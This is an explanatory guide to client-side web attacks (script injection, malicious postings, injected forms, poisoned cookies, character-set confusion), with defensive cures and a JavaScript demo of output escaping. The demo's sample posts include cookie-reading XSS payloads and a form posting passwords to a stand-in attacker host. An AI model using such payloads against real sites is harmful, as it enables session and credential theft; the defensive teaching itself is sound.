subject: What are Client-side web attacks?
Web attacks can take place on the user's end, in which case they are called client-side attacks. Client-side web attacks include the following:
Malicious HTML tags in web requests
Form input that carries HTML or script can be copied, unchecked, into the page the server generates in reply. The result is unpredictable or dangerous whether the input is interpreted on the server or sent back to the browser: a malformed page returned to the client carries the attacker's markup, and the browser runs it in the victim's session.
Cure: Webmasters must not accept unvalidated input. Validate and encode form data on the server. Client-side scripting may tidy up form data before it is transmitted, but an attacker can bypass it by sending the request directly, so it is a convenience for honest users, not a control.
Malicious code from other clients
A web site with a discussion group may be open to attacks of the form:
Hello Buddy- Here is my message!
<SCRIPT> malicious code </SCRIPT>
That is all!
If a victim client has scripting enabled, their browser runs this code, unexpectedly and with the victim's own cookies and session, as soon as it renders the posting.
Cure: Users can turn off script functions, but the site cannot rely on that. Web servers should treat every posting as untrusted text and encode it for HTML on output. Screening for embedded tags that show a script may be present catches only the obvious cases: script also runs from event-handler attributes such as onerror on an IMG tag, which a tag blocklist misses.
Clients sending malicious code to themselves
An attacker can slip a client a message or file and encourage them to post it to the server. When the server echoes or displays the posting, the client's own browser executes it.
Cure: Webmasters should screen and encode data on output, even if the intended recipient is the client that sent it.
Abuse of tags
Tags such as FORM, harmless enough on their own, cause trouble if they are embedded at the wrong place. An intruder who can inject a FORM or an extra INPUT into a page can modify the behavior of an existing form, for example by pointing its action at a server the intruder controls, and so trick users into revealing sensitive information; or the injected markup can display information that was held in the form of a previous user. Other HTML tags can alter the appearance of a page, insert unwanted or offensive images or sounds, break things, and otherwise disturb the peace by interfering with the page's intended appearance and behavior.
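The items above (tags in form input, a script posted to a discussion group, a posting the victim is tricked into sending, and an injected FORM) all come down to one mistake: untrusted text concatenated into HTML. The following is an added example, not code from the original page, showing a vulnerable renderer beside a hardened one and why the "screen for script tags" cure alone is not enough. The function names and the three sample postings are constructed for this illustration.

```javascript
// Added example (not from the original page): server-side handling of
// user-supplied text before it is echoed into an HTML page. Function
// names and the sample posts are assumptions made for this illustration.

// Escape the five characters that let text break out of an HTML text node
// or attribute value. Applied on output, so it does not matter whether the
// text came from a form, a discussion-board post, or a file the user was
// tricked into posting to themselves.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// The page's "screen for script tags" cure as a blocklist on the input.
// Kept here to show what it catches and what it misses.
function looksLikeScript(s) {
  return /<\s*script\b/i.test(s);
}

// Vulnerable rendering: the posting is concatenated into the page as-is.
function renderPostUnsafe(author, body) {
  return `<div class="post"><b>${author}</b><p>${body}</p></div>`;
}

// Hardened rendering: every untrusted value is escaped at the point it is
// inserted into HTML, whoever sent it.
function renderPost(author, body) {
  return `<div class="post"><b>${escapeHtml(author)}</b><p>${escapeHtml(body)}</p></div>`;
}

// Constructed sample posts, following the page's discussion-group scenario.
const posts = [
  { author: 'Buddy',
    body: 'Hello Buddy- Here is my message!\n<script>alert(document.cookie)</script>\nThat is all!' },
  // No <script> tag at all, so the blocklist passes it, yet it runs script.
  { author: 'Eve', body: '<img src=x onerror="alert(document.cookie)">' },
  // An injected FORM that would capture the next user's password.
  { author: 'Mallory',
    body: '<form action="https://evil.example/steal"><input name="password"></form>' },
];

// For each post: did the blocklist flag it, and does each renderer's output
// still contain a live SCRIPT, IMG or FORM tag?
function demo() {
  const liveTag = /<(script|img|form)\b/i;
  return posts.map((p) => ({
    author: p.author,
    screened: looksLikeScript(p.body),
    unsafeHasTag: liveTag.test(renderPostUnsafe(p.author, p.body)),
    safeHasTag: liveTag.test(renderPost(p.author, p.body)),
  }));
}

console.log(JSON.stringify(demo(), null, 2));
```

Only the first posting trips the blocklist; the second and third carry no SCRIPT tag but still inject a live IMG handler and a FORM through the unsafe renderer. The escaping renderer neutralises all three without needing to recognise any of them, which is why encoding on output is the control and screening is at best a supplement.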
Cure: Set browser security to high and lower it only for those users you are sure will not violate that trust. On the server, encode user-supplied text on output so that it cannot introduce tags at all.
Poisoned cookies
While visiting a web site, a simple text file called a cookie is often placed on the user's computer. At the next visit, the web server reads the cookie and can use its data to recall the previous conversation. A poisoned cookie is one that the attacker has altered. A cookie is plain text and does not run by itself; the harm comes when the server trusts the altered value (taking the user for someone else, or for a more privileged user) or echoes it into a page where the browser interprets it as HTML or script.
Cure: Keep security settings high until trust is earned. On the server, never trust cookie contents: store only an opaque session identifier, or sign the cookie so that any alteration is detected, and mark session cookies Secure and HttpOnly. Virus-scanning cookies does not help, since a cookie is data the server interprets, not a program.
Using the wrong character set
Browsers interpret the information they receive according to the character set declared for the page, or the one chosen by the user if none is declared. If the server fails to specify a character set, the browser guesses, which can result in garbled displays or, worse, in bytes that one decoder treats as harmless text being read by another as markup, letting input slip past a filter.
Cure: Servers should declare the character set in the Content-Type header of every response, and users should declare their character set when configuring their browsers.